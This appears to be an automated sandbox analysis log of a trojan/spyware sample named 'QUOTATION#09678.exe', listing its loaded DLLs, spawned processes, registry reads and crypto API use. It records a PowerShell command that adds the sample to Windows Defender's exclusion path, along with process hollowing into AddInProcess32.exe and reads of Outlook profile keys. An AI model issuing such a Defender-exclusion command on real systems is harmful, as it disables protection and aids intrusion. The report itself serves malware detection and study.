                  Source: 0.2.QUOTATION#09678.exe.1f3e007af08.1.raw.unpack, 71JxQ8.csCryptographic APIs: 'CreateDecryptor', 'TransformBlock'
                  Source: 0.2.QUOTATION#09678.exe.1f3e007af08.1.raw.unpack, CnG3o.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.QUOTATION#09678.exe.1f3e007af08.1.raw.unpack, 2FAFIfKp.csCryptographic APIs: 'CreateDecryptor'
                  Source: 0.2.QUOTATION#09678.exe.1f3e007af08.1.raw.unpack, gdOsx.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.QUOTATION#09678.exe.1f3e007af08.1.raw.unpack, gdOsx.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                  Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@11/10@3/3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMutant created: NULL
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6664:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3400:120:WilError_03
                  Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1104
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1ammgx2j.24r.ps1Jump to behavior
                  Source: QUOTATION#09678.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: QUOTATION#09678.exeStatic file information: TRID: Win64 Executable Console Net Framework (206006/5) 48.58%
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\Desktop\QUOTATION#09678.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION#09678.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: QUOTATION#09678.exeReversingLabs: Detection: 36%
                  Source: C:\Users\user\Desktop\QUOTATION#09678.exeFile read: C:\Users\user\Desktop\QUOTATION#09678.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\QUOTATION#09678.exe "C:\Users\user\Desktop\QUOTATION#09678.exe"
                  Source: C:\Users\user\Desktop\QUOTATION#09678.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\QUOTATION#09678.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QUOTATION#09678.exe" -Force
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\QUOTATION#09678.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                  Source: C:\Users\user\Desktop\QUOTATION#09678.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                  Source: C:\Users\user\Desktop\QUOTATION#09678.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1104 -s 1516
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                  Source: C:\Users\user\Desktop\QUOTATION#09678.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QUOTATION#09678.exe" -ForceJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION#09678.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION#09678.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION#09678.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION#09678.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION#09678.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION#09678.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION#09678.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION#09678.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION#09678.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION#09678.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION#09678.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION#09678.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION#09678.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION#09678.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION#09678.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION#09678.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION#09678.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION#09678.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION#09678.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION#09678.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION#09678.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION#09678.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION#09678.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION#09678.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION#09678.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION#09678.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION#09678.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION#09678.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION#09678.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION#09678.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION#09678.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION#09678.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION#09678.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: vaultcli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION#09678.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\user\Desktop\QUOTATION#09678.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                  Source: QUOTATION#09678.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: QUOTATION#09678.exeStatic file information: File size 2313878 > 1048576
                  Source: QUOTATION#09678.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: Microsoft.VisualBasic.ni.pdb source: WERF85.tmp.dmp.8.dr
                  Source: Binary string: System.Windows.Forms.pdb source: WERF85.tmp.dmp.8.dr
                  Source: Binary string: mscorlib.pdb source: WERF85.tmp.dmp.8.dr
                  Source: Binary string: System.ni.pdbRSDS source: WERF85.tmp.dmp.8.dr
                  Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WERF85.tmp.dmp.8.dr
                  Source: Binary string: System.Windows.Forms.pdb0 source: WERF85.tmp.dmp.8.dr
                  Source: Binary string: System.Drawing.pdb source: WERF85.tmp.dmp.8.dr
                  Source: Binary string: System.pdbh source: WERF85.tmp.dmp.8.dr
                  Source: Binary string: System.Windows.Forms.ni.pdb source: WERF85.tmp.dmp.8.dr
                  Source: Binary string: mscorlib.ni.pdb source: WERF85.tmp.dmp.8.dr
                  Source: Binary string: System.Drawing.ni.pdb source: WERF85.tmp.dmp.8.dr
                  Source: Binary string: System.Core.pdb source: WERF85.tmp.dmp.8.dr
                  Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WERF85.tmp.dmp.8.dr
                  Source: Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WERF85.tmp.dmp.8.dr
                  Source: Binary string: System.Drawing.ni.pdbRSDS source: WERF85.tmp.dmp.8.dr
                  Source: Binary string: System.ni.pdb source: WERF85.tmp.dmp.8.dr
                  Source: Binary string: System.pdb source: WERF85.tmp.dmp.8.dr
                  Source: Binary string: System.Drawing.pdbh source: WERF85.tmp.dmp.8.dr
                  Source: Binary string: System.Core.ni.pdbRSDS source: WERF85.tmp.dmp.8.dr
                  Source: Binary string: Microsoft.VisualBasic.pdb source: WERF85.tmp.dmp.8.dr
                  Source: Binary string: System.Core.ni.pdb source: WERF85.tmp.dmp.8.dr
                  Source: C:\Users\user\Desktop\QUOTATION#09678.exeCode function: 0_2_00007FFD9B8877CE pushad ; iretd 0_2_00007FFD9B88785D
                  Source: C:\Users\user\Desktop\QUOTATION#09678.exeCode function: 0_2_00007FFD9B888167 push ebx; ret 0_2_00007FFD9B88816A
                  Source: C:\Users\user\Desktop\QUOTATION#09678.exeCode function: 0_2_00007FFD9B88796B push ebx; retf 0_2_00007FFD9B88796A
                  Source: C:\Users\user\Desktop\QUOTATION#09678.exeCode function: 0_2_00007FFD9B88796B push eax; retf 0_2_00007FFD9B8879AD
                  Source: C:\Users\user\Desktop\QUOTATION#09678.exeCode function: 0_2_00007FFD9B88785E push eax; iretd 0_2_00007FFD9B88786D
                  Source: C:\Users\user\Desktop\QUOTATION#09678.exeCode function: 0_2_00007FFD9B88787E push ebx; retf 0_2_00007FFD9B88796A
                  Source: C:\Users\user\Desktop\QUOTATION#09678.exeCode function: 0_2_00007FFD9B950050 push esp; retf 4810h0_2_00007FFD9B950312
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_02CA0C6D push edi; retf 4_2_02CA0C7A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_069A7350 push es; ret 4_2_069A7360

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Loading BitLocker PowerShell Module
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION#09678.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION#09678.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION#09678.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION#09678.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION#09678.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION#09678.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION#09678.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION#09678.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION#09678.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION#09678.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION#09678.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION#09678.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION#09678.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION#09678.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION#09678.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION#09678.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION#09678.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION#09678.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION#09678.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION#09678.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION#09678.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION#09678.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION#09678.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION#09678.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION#09678.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION#09678.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION#09678.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION#09678.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION#09678.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION#09678.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION#09678.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION#09678.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION#09678.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION#09678.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION#09678.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION#09678.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION#09678.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION#09678.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION#09678.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
